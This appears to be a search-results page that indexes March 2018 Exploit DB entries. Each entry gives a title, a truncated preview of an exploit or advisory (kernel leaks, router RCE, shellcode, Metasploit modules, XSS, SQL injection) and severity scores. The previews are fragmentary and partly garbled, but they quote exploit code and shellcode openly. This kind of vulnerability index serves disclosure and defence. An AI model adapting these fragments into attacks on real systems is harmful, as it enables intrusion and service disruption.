
47885 matches found

Exploit DB
added 2018/03/20 12:0 a.m. | 40 views

Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory Disclosure

/ We have discovered that the nt!NtWaitForDebugEvent system call discloses portions of uninitialized kernel stack memory to user-mode clients, on 64-bit versions of Windows 7 to Windows 10. The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0xB8 184 bytes in...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 44 views

Coship RT3052 Wireless Router - Persistent Cross-Site Scripting

Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting XSS Date: 2018-03-18 Exploit Author: Sayan Chatterjee Vendor Homepage: http://en.coship.com/ Category: Hardware Wifi Router Version: 4.0.0.48 Tested on: Windows 10 CVE: CVE-2018-8772 Proof of Concept =================...

6.1 CVSS | 6.4 AI score | 0.00362 EPSS
Exploits: 3
Exploit DB
added 2018/03/20 12:0 a.m. | 61 views

Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation

Windows: Windows: Desktop Bridge Virtual Registry Arbitrary File Read/Write EoP Platform: Windows 1709 not tested earlier version Class: Elevation of Privilege Summary: The handling of the virtual registry for desktop bridge applications can allow an application to create arbitrary files as syste...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 25 views

Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' 64-bit Pool Memory Disclosure

/ We have discovered that the nt!NtQueryVirtualMemory system call invoked with the 2 information class MemoryMappedFilenameInformation discloses portions of uninitialized kernel pool memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 to 10. The output buffer for...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 57 views

Cisco node-jose < 0.11.0 - Re-sign Tokens

!/usr/bin/env python3 import base64 from urllib.parse import quoteplus import rsa import sys zi0Black ''' EDB Note: This has been updated https://github.com/offensive-security/exploitdb/pull/139 POC of CVE-2018-0114 Cisco node-jose = 8 return b::-1 def generateheaderpayloadpayload,pubkey: create...

7.5 CVSS | 7.5 AI score | 0.84691 EPSS
Exploits: 6
Exploit DB
added 2018/03/20 12:0 a.m. | 43 views

Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap Overflow

''' Off-by-one heap overflow in Kamailio - Authors: - Alfred Farrugia - Sandro Gauci - Fixed versions: Kamailio v5.1.2, v5.0.6 and v4.4.7 - References: no CVE assigned yet - Enable Security Advisory: - Tested vulnerable versions: 5.1.1, 5.1.0, 5.0.0 - Timeline: - Report date: 2018-02-10 - Kamaili...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 44 views

Microsoft Windows Kernel - 'nt!KiDispatchException' 64-bit Stack Memory Disclosure

/ We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a EXCEPTIONRECORD structure to user-mode memory while passing execution to a user-mode exception handler. The vulnerability affects 64-bit versions of Windows 7 to 10. The leak was originally...

7 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 58 views

Microsoft Windows Kernel - 'NtQueryInformationThread(ThreadBasicInformation)' 64-bit Stack Memory Disclosure

/ We have discovered that the nt!NtQueryInformationThread system call invoked with the 0 information class ThreadBasicInformation discloses portions of uninitialized kernel stack memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 to 10. The specific layout of the...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 34 views

Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation

/ Google software updater ships with Chrome on MacOS and installs a root service com.google.Keystone.Daemon.UpdateEngine which lives here: /Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateDaemon This service vends a Distributed Object which expos...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 3337 views

OpenSSH < 6.6 SFTP - Command Execution

OpenSSH 8 else 32 print "+ bit libc mapped @ -, path: ".formatBITS, addr0, addr1, path libcbase = intaddr0, 16 libcpath = path if "stack" in line: addr = addr.split"-" saddrstart = intaddr0, 16 saddrend = intaddr1, 16 print "+ Stack mapped @ -".formataddr0,...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 360 views

Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)

Linux/x86 - execve/bin/sh Shellcode 18 bytes. Shellcode exploit for Linuxx86 platform / Linux/x86 - execve /bin/sh shellcode 18 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 18 Disassembly of section .text: 08048060 : 8048060: 6a 0b push 0xb 8048062: 58 pop eax...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/20 12:0 a.m. | 57 views

Microsoft Windows - Desktop Bridge VFS Privilege Escalation

Windows: Windows: Desktop Bridge VFS EoP Platform: Windows 1709 not tested earlier version Class: Elevation of Privilege Summary: The handling of the VFS for desktop bridge applications can allow an application to create virtual files in system folder which can result in EoP. Description: The...

7 AI score
Exploits: 0
Exploit DB
added 2018/03/16 12:0 a.m. | 40 views

Contec Smart Home 4.15 - Unauthorized Password Reset

Title : Contec smart home 4.15 Unauthorized Password Reset Shodan Dork : "content/smarthome.php" Vendor Homepage : http://contec.co.il Tested on : Google Chrome Tested version : 4.15 Date : 2018-03-14 Author : Z3ro0ne Contact : [email protected] Facebook Page : https://www.facebook.com/Z3ro0...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/16 12:0 a.m. | 61 views

Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution

CVE-2016-2819 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x5a500000 / target address of asm.js float pool payload/ var targeteip = 0x20200b58 / spr...

9.8 CVSS | 9.7 AI score | 0.64664 EPSS
Exploits: 13
Exploit DB
added 2018/03/16 12:0 a.m. | 150 views

Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution

46.0.1 -- CVE-2016-1960 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x20200000 / target address of asm.js float pool payload/...

9.8 CVSS | 8.1 AI score | 0.86455 EPSS
Exploits: 17
Exploit DB
added 2018/03/16 12:0 a.m. | 52 views

Unitrends UEB 10.0 - Root Remote Code Execution

Exploit Title: Unauthenticated root RCE for Unitrends UEB 10.0 Date: 10/17/2017 Exploit Authors: Cale Smith, Benny Husted, Jared Arave Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...

10 CVSS | 7 AI score | 0.78992 EPSS
Exploits: 11
Exploit DB
added 2018/03/16 12:0 a.m. | 536 views

Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

/ Ubuntu 16.04.4 kernel priv esc all credits to @bleidl - vnik / // Tested on: // 4.4.0-116-generic 140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x8664 // if different kernel adjust CRED offset + check kernel stack size include include include include include include include include include include...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/15 12:0 a.m. | 37 views

Android DRM Services - Buffer Overflow

include include include include include include include include include include using namespace android; static sp getCrypto sp sm = defaultServiceManager; sp binder = sm-getServiceString16"media.drm"; sp service = interfacecastbinder; if service == NULL fprintfstderr, "Failed to retrieve...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/15 12:0 a.m. | 151 views

Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)

include include include include pragma commentlib, "psapi.lib" define POCDEBUG 0 if POCDEBUG == 1 define POCDEBUGBREAK getchar elif POCDEBUG == 2 define POCDEBUGBREAK DebugBreak else define POCDEBUGBREAK endif CONST LONG maxTimes = 2000; CONST LONG tmpTimes = 3000; static HBITMAP hbitmapmaxTimes ...

7.8 CVSS | 7.8 AI score | 0.72264 EPSS
Exploits: 3
Exploit DB
added 2018/03/15 12:0 a.m. | 62 views

Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution

// Exploit Title: RCE in PATCH requests in Spring Data REST // Date: 2018-03-10 // Exploit Author: Antonio Francesco Sardella // Vendor Homepage: https://pivotal.io/ // Software Link: https://projects.spring.io/spring-data-rest/ // Version: Spring Data REST versions prior to 2.6.9 Ingalls SR9,...

9.8 CVSS | 7.6 AI score | 0.93978 EPSS
Exploits: 6
Exploit DB
added 2018/03/15 12:0 a.m. | 41 views

WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting

Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting XSS Date: 25-02-2018 Exploit Author : Stefan Broeder Contact : https://twitter.com/stefanbroeder Vendor Homepage: https://snapcreek.com/ Software Link: https://wordpress.org/plugins/duplicator/ Version: 1.2.32 CV...

6.1 CVSS | 6.5 AI score | 0.01419 EPSS
Exploits: 5
Exploit DB
added 2018/03/15 12:0 a.m. | 139 views

MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow

!/usr/bin/env python import socket import struct import sys import telnetlib NETBIOSSESSIONMESSAGE = "\x00" NETBIOSSESSIONREQUEST = "\x81" NETBIOSSESSIONFLAGS = "\x00" trick from http://shell-storm.org/shellcode/files/shellcode-881.php will place the socket file descriptor in eax findsockfd =...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/14 12:0 a.m. | 74 views

SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution

!/usr/bin/env python import argparse import urllib import requests, random from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disablewarningsInsecureRequestWarning helpdesc = ''' PoC of Remote Command Execution via Log...

6.6 CVSS | 7 AI score | 0.48793 EPSS
Exploits: 5
Exploit DB
added 2018/03/13 12:0 a.m. | 47 views

Tuleap 9.17.99.189 - Blind SQL Injection

=============================================================================== title: Tuleap SQL Injection case id: CM-2018-01 product: Tuleap version 9.17.99.189 vulnerability type: Blind SQL injection - time based severity: High found: 2018-02-24 by: Cristiano Maruti @cmaruti...

9.8 CVSS | 9.8 AI score | 0.11993 EPSS
Exploits: 6
Exploit DB
added 2018/03/13 12:0 a.m. | 60 views

SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Critical Vulnerabilities product: SecurEnvoy SecurMail vulnerable version: 9.1.501 fixed version: 9.2.501 or hotfix patch "1012018" CVE number: CVE-2018-7701,...

9.1 CVSS | 6.9 AI score | 0.36875 EPSS
Exploits: 10
Exploit DB
added 2018/03/12 12:0 a.m. | 29 views

SC 7.16 - Stack-Based Buffer Overflow

Exploit Author: Juan Sacco - http://www.exploitpack.com Bug found using Exploit Pack - Local fuzzer feature. Tested on: GNU/Linux - Kali Linux Filename: pool/main/s/sc/sc7.16-4+b2i386.deb Description: SC v7.16 is prone to a basic stack-based buffer overflow vulnerability because the application...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 51 views

MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution

!/usr/bin/env python2 Mikrotik Chimay Red Stack Clash Exploit by wsxarcher based on BigNerd95 POC tested on RouterOS 6.38.4 x86 ASLR enabled on libs only DEP enabled import socket, time, sys, struct from pwn import import ropgadget ASTSTACKSIZE = 0x800000 default stack size per thread 8 MB...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 52 views

Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow

Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability Windows XP SP3 Date: 06-03-2018 Exploit Author: Mohan Ravichandran & Velayutham Selvaraj Organization : TwinTech Solutions Vulnerable Software: Allok Video Converter Vendor Homepage: http://www.alloksoft.com Version: 4.6.1217...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 54 views

TextPattern 4.6.2 - 'qty' SQL Injection

============================================= MGC ALERT 2018-002 - Original release date: February 12, 2018 - Last revised: March 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score - CVE-ID: CVE-2018-7474 ============================================= I...

9.8 CVSS | 9.8 AI score | 0.17139 EPSS
Exploits: 5
Exploit DB
added 2018/03/12 12:0 a.m. | 37 views

ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution

Exploit Title: Arbitrary Code Execution Google Dork: N/A Date: 03-07-2018 Exploit Author: Clutchisback1 Vendor Homepage: https://www.acl.com Software Link: https://www.acl.com/products/acl-analytics/ Version: 11.x - 13.0.0.579 Tested on: Windows 7 pro SP1 x86 Clutchisback1 ///\ I'll get OSCP one...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 58 views

Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution

!/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...

10 CVSS | 9.8 AI score | 0.21846 EPSS
Exploits: 5
Exploit DB
added 2018/03/12 12:0 a.m. | 36 views

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials

Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass Vendor: Prisma Industriale S.r.l. Product web page: https://www.prismaindustriale.com Affected version: 1.0 Rev 21, EPROM 202FWSAM ?? Summary: Web Administration of Machine. Desc: The vulnerability exists due to the disclosure o...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 48 views

DEWESoft X3 SP1 (x64) - Remote Command Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt + ISR: Apparition Security Vendor: ============= www.dewesoft.com Product: =========== DEWESoft X3 SP1 64-bit installer - X3...

10 CVSS | 9.8 AI score | 0.34394 EPSS
Exploits: 5
Exploit DB
added 2018/03/12 12:0 a.m. | 32 views

Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'base64' class MetasploitModule 'Eclipse Equinoxe OSGi Console Command Execution', 'Description' = %q Exploit Eclipse Equinoxe OSGi Open Service Gateway initiati...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 55 views

MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution

!/usr/bin/env python3 Mikrotik Chimay Red Stack Clash Exploit by BigNerd95 Tested on RouterOS 6.38.4 mipsbe using a CRS109 Used tools: pwndbg, rasm2, mipsrop for IDA I used ropper only to automatically find gadgets ASLR enabled on libs only DEP NOT enabled import socket, time, sys, struct, re fro...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/12 12:0 a.m. | 37 views

ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager Remote Code Execution", 'Description' = %q This module exploits command injection vulnerability in the...

10 CVSS | 7.4 AI score | 0.86279 EPSS
Exploits: 8
Exploit DB
added 2018/03/10 12:0 a.m. | 38 views

Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)

window.didload = 0; window.didpost = 0; window.onload = function window.didload = 1; if window.didpost == 1 window.stage2; window.postExpl = function window.didpost = 1; if window.didload == 1 window.stage2; function makeid var text = ""; var possible =...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/09 12:0 a.m. | 35 views

Bacula-Web < 8.0.0-rc2 - SQL Injection

Exploit Title: Multiple SQL injection vulnerabilities in Bacula-Web Date: 2018-03-07 Software Link: http://bacula-web.org/ Exploit Author: Gustavo Sorondo Contact: http://twitter.com/iampuky Website: http://cintainfinita.com/ CVE: CVE-2017-15367 Category: webapps 1. Description Bacula-web before...

9.8 CVSS | 9.8 AI score | 0.222 EPSS
Exploits: 5
Exploit DB
added 2018/03/09 12:0 a.m. | 45 views

WebLog Expert Enterprise 9.4 - Denial of Service

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt + ISR: Apparition Security Vendor: ======= www.weblogexpert.com Product: ========= WebLog Expert Web Server...

7.5 CVSS | 7.8 AI score | 0.36028 EPSS
Exploits: 5
Exploit DB
added 2018/03/09 12:0 a.m. | 42 views

WebLog Expert Enterprise 9.4 - Authentication Bypass

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt + ISR: Apparition Security Vendor: ======== www.weblogexpert.com Product: ======== WebLog Expert Web Server...

7.8 CVSS | 7.9 AI score | 0.0009 EPSS
Exploits: 5
Exploit DB
added 2018/03/08 12:0 a.m. | 42 views

Memcached 1.5.5 - 'Memcrashed' Insufficient Control of Network Message Volume Denial of Service With Shodan API

-- coding: utf8 -- !/usr/bin/python Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44265.zip import sys, os, time, shodan from pathlib import Path from scapy.all import from contextlib import contextmanager starttime=time.time @contextmanager def...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/07 12:0 a.m. | 29 views

Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection

Exploit Title: Redaxo CMS Addon MyEvents SQL Injection Backend Date: 01.03.2018 Exploit Author: h0n1gsp3cht Vendor Homepage: http://www.github.com/wende60/myevents Version: 2.2.1 Last Version Tested on: LinuxMint More: Login Required GET Vuln Code + redaxo/src/addons/myevents/pages/eventadd.php...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/07 12:0 a.m. | 39 views

antMan 0.9.0c - Authentication Bypass

Exploit Title: antMan and the password to a url-encoded linefeed %0a, we can force the authentication script to produce return values not anticipated by the developer. To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/06 12:0 a.m. | 19 views

Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is "null"

/ I think this commit has introduced the bug. https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/F2 According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null". The following check has to...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/06 12:0 a.m. | 52 views

Bravo Tejari Web Portal - Cross-Site Request Forgery

Exploit Title: Bravo Tejari Web Portal-CSRF CVE-ID: CVE-2018-7216 Vulnerability Type: Cross Site Request Forgery CSRF Vendor of Product: Tejari Affected Product Code Base: Bravo Solution Affected Component: Web Interface Management. Attack Type: Local - Authenticated Impact: Unauthorised Access...

8 CVSS | 7 AI score | 0.0023 EPSS
Exploits: 5
Exploit DB
added 2018/03/06 12:0 a.m. | 30 views

Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField, IrOpcode::kStoreElement Optimization Bug

/ I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/F0 Here's a snippet. case IrOpcode::kStoreField: FieldAccess access = FieldAccessOfnode-op; Node valuenode = node-InputAt1; NodeInfo inputinfo = GetInfovaluenode...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/06 12:0 a.m. | 56 views

Softros Network Time System Server 2.3.4 - Denial of Service

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt + ISR: Apparition Security Vendor: ============= www.softros.com https://nts.softros.com/downloads/ Product:...

7.5 CVSS | 7.7 AI score | 0.17994 EPSS
Exploits: 5
Exploit DB
added 2018/03/06 12:0 a.m. | 33 views

Chrome V8 JIT - 'GetSpecializationContext' Type Confusion

PoC: function optarg = = arg let tmp = opt.x; // LdaNamedProperty for ;; arg; yield; function inner tmp; break; for let i = 0; i arg; this; , opt let tmp = arg.x; for ;; arg; yield; tmp = inner tmp; ; for let i = 0; i 10000; i++ opt; What happened: 1. The LdaNamedProperty operation "opt.x" was...

7.4 AI score
Exploits: 0
Exploit DB
added 2018/03/06 12:0 a.m. | 26 views

Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read

/ In the current implementation, the bytecode generator also emits empty jump tables. https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89 So the bytecode for the example code would be generated as follows: Code: functi...

7 AI score
Exploits: 0
Exploit DB
added 2018/03/05 12:0 a.m. | 28 views

Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)

Written by Alex Conrey Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44254.zip This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, eithe...

7.4 AI score
Exploits: 0

Total number of security vulnerabilities: 47885